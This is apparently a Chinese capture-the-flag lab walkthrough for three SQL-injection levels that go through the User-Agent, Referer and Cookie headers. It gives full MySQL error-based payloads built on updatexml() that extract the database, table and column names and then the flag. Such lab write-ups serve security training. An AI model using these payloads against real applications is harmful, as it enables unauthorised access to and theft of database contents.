SQL注入靶场—Header注入 Rank1-3
----------------- Rank 1 ------------------------------------------------------------------
使用admin/admin登录, 出现客户端的信息User Agent,如下:
data:image/s3,"s3://crabby-images/aa77f/aa77f7c36d84a07d96bbe770d9b8e096be3d5922" alt=""
说明HTTP头部的信息被服务端保存到了数据库中。所以利用Firefox浏览器的HackBar插件,尝试在User Agent中注入。
先在User-Agent输入框中输入1:
data:image/s3,"s3://crabby-images/1cac5/1cac5fec8731bcfd7adc4156a8b2b8f85ed5eb80" alt=""
点击 Execute,页面回显如下:
data:image/s3,"s3://crabby-images/c6487/c648704881518d0ff13c2170b6b12faac9872d93" alt=""
再尝试输入 1' 进行测试:
data:image/s3,"s3://crabby-images/01899/01899cc588c212eeae88102aeec635c8bebf7e89" alt=""
页面显示报错信息,从报错信息中可以看到用的是MySQL数据库:
data:image/s3,"s3://crabby-images/fafcc/fafcc547344227dbafdf96e9a7c950a5bdef85d1" alt=""
这里使用MySQL的updatexml() 函数进行报错注入,把想查询的信息回显在MySQL的报错信息中。
获取当前数据库名,构造语句如下:
1' or updatexml(0,concat(0x3a,(select database())),0),'','') #
data:image/s3,"s3://crabby-images/0519c/0519c4154ef33de8b9e4fcaeff20bbe2df9cedeb" alt=""
data:image/s3,"s3://crabby-images/45911/459118f12a0e7884f6dde23ca07c89267a0079ed" alt=""
获取表名,构造语句如下:
1' or updatexml(0,concat(0x3a,(select table_name from information_schema.tables where table_schema='security' limit 4,1)),0),'','') #
data:image/s3,"s3://crabby-images/78d58/78d584fa4b5cf300417024a49d442629dccec8a2" alt=""
data:image/s3,"s3://crabby-images/3a5a4/3a5a43189f6c758dad99dab34a1e064b1ff673ac" alt=""
获取字段名,构造语句如下:
1' or updatexml(0,concat(0x3a,(select column_name from information_schema.columns where table_name='zkaq' limit 1,1)),0),'','') #
data:image/s3,"s3://crabby-images/f60bf/f60bf93c47a5710bdf91e21ff21119faba693573" alt=""
data:image/s3,"s3://crabby-images/232b9/232b9487a67a52d81fe69751cf849957801424fc" alt=""
最后查询表zkaq中的zKaQ字段的内容,就能拿到flag。
----------------- Rank 2 ------------------------------------------------------------------
使用admin/admin登录后,页面显示了客户端Referer的信息:
data:image/s3,"s3://crabby-images/254c5/254c5004b0035bfdbe302d0f0bfea53384228c9f" alt=""
说明服务端获取了HTTP请求头中Referer头的信息并保存在了数据库中,所以这里尝试对Referer头进行注入,同样是使用Firefox的Hackbar插件。
先在Referer框输入1:
data:image/s3,"s3://crabby-images/c7b2c/c7b2cf6f85f8b78002ca7f8e3158d363c5ca5ffe" alt=""
点击Execute,观察页面回显:
data:image/s3,"s3://crabby-images/346e3/346e34a029f57c918c152a5d41f842f57a572967" alt=""
再输入1' 进行测试:
data:image/s3,"s3://crabby-images/7a6df/7a6df68fb94b96a83ff361939a1bd74e7d186720" alt=""
可以看到页面显示报错信息,从中可以看到用的是MySQL数据库:
data:image/s3,"s3://crabby-images/4b63b/4b63b05e385a7d69c034242bc4e598b7b21ba5b6" alt=""
所以这里一样使用updatexml() 在Referer处进行报错注入。
注入的语句跟上面 Rank 1 的一样,只是这道题是注入到Referer头而已,这里不详细说了。
----------------- Rank 3 ------------------------------------------------------------------
使用admin/admin登录后,页面显示内容如下:
data:image/s3,"s3://crabby-images/dfe8c/dfe8cd4f816eeb7a063b23f05fc3fac5f4df2315" alt=""
可以看到这次是将Cookie的内容保存到数据库中了。
下面使用Firefox的 Cookie Quick Manager 插件来对当前页面的Cookie进行修改:
data:image/s3,"s3://crabby-images/e6816/e6816bd8dd33056282fe9a642d6ea779be9ba353" alt=""
获取当前数据库名:
admin' or updatexml(0,concat(0x3a,(select database())),0) #
data:image/s3,"s3://crabby-images/81721/8172189d57533d2f2f9c2d15fb9142b6f0585ac7" alt=""
获取表名:
admin' or updatexml(0,concat(0x3a,(select table_name from information_schema.tables where table_schema='security' limit 4,1)),0) #
data:image/s3,"s3://crabby-images/a1eb5/a1eb5b2ea37027c1bda1f2ec0292a97cf927187c" alt=""
获取字段名:
admin' or updatexml(0,concat(0x3a,(select column_name from information_schema.columns where table_name='zkaq' limit 1,1)),0) #
data:image/s3,"s3://crabby-images/f999c/f999cefa0c65b32979c12b628bf2ad18586b58c4" alt=""
获取flag:
admin' or updatexml(0,concat(0x3a,(select zKaQ from zkaq limit 1,1)),0) #